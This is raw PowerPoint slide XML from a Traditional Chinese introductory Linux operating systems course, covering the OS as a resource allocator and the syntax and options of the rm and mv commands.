Target="../media/image327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00.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink694.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3290.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink691.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink696.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink700.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3220.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink698.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3190.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink693.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3240.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3280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customXml" Target="../ink/ink704.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3331.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink709.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3371.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3302.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink706.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3351.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide88.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink708.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71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03.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3321.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image862.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3341.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink705.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3361.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink702.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3311.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink707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customXml" Target="../ink/ink713.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3350.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink718.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink722.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3320.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink715.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3370.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3301.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide89.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink717.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink719.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342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12.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3340.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink721.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3360.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink723.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink714.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3380.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink711.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3330.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink716.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink720.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.emf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6.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.emf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33.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink25.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21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customXml" Target="../ink/ink726.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image346.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image343.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink728.xm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25.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3420.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink727.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink724.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34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customXml" Target="../ink/ink729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60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9.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink735.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink730.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink732.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image351.emf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8.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink734.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink731.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink733.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352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customXml" Target="../ink/ink736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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink737.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353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customXml" Target="../ink/ink738.xml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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink739.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image355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9.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink745.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image368.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink740.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink749.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink742.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image361.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink747.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink751.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide97.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image363.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36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8.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink744.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image367.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink741.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink746.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink750.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image369.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink748.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink743.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image362.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75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2.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink753.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink755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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink754.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.e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5.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink761.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink756.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink758.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image377.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink763.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide99.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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4.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink760.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink757.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink762.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image376.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image373.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink759.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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44675"/>
            <a:ext cx="7772400" cy="1584325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TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>LINUX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>作業系統概論</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411560" y="3716338"/>
            <a:ext cx="6400800" cy="1752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TW" altLang="en-US" kern="0" smtClean="0"/>
              <a:t>資電</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>訓測暨準則發展中心</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" kern="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C2F6C3-9846-4330-8B31-536AC8552DD9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>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TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>我們可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>看成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>是一個資源分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。在電腦系統中有許多資源，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>時間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>記憶體空間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔案儲存和輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>輸出裝置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等，作業系統必須決定那一種安排可以使電腦系統作最有效、最公平的處理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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何謂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7478640" y="2070360"/>
              <a:ext cx="1221480" cy="331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462800" y="2007000"/>
                <a:ext cx="12531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94960" y="2540880"/>
              <a:ext cx="37908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79120" y="2477160"/>
                <a:ext cx="410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606680" y="2540880"/>
              <a:ext cx="2639160" cy="1764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590840" y="2477160"/>
                <a:ext cx="2670840" cy="30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754240" y="2468880"/>
              <a:ext cx="2965680" cy="1047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738400" y="2405520"/>
                <a:ext cx="299736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286640" y="3585600"/>
              <a:ext cx="5565240" cy="33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70800" y="3522240"/>
                <a:ext cx="55969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089520" y="1573920"/>
              <a:ext cx="1522080" cy="1051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73680" y="1510560"/>
                <a:ext cx="155376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7132320" y="1587240"/>
              <a:ext cx="1646280" cy="590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116480" y="1523520"/>
                <a:ext cx="167796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1136520" y="2063880"/>
              <a:ext cx="222480" cy="26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120680" y="2000520"/>
                <a:ext cx="2541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4519800" y="2599560"/>
              <a:ext cx="3364200" cy="331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503960" y="2535840"/>
                <a:ext cx="3395880" cy="160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191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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>結構</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>及磁盤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>刪除檔案中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/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400" dirty="0" smtClean="0"/>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>遞迴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>刪除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>刪除資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：強制刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>不詢問</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>)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rm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6546960" y="1581120"/>
              <a:ext cx="1416240" cy="450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531120" y="1517760"/>
                <a:ext cx="1447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009800" y="3975120"/>
              <a:ext cx="2318040" cy="957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93600" y="3911760"/>
                <a:ext cx="235008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759120" y="3905280"/>
              <a:ext cx="240696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43280" y="3841920"/>
                <a:ext cx="243864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047600" y="4527720"/>
              <a:ext cx="4585320" cy="108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31760" y="4464000"/>
                <a:ext cx="4617000" cy="235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656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/>
              <a:t>mv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可移動和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>變更名稱</a:t>
            </a:r>
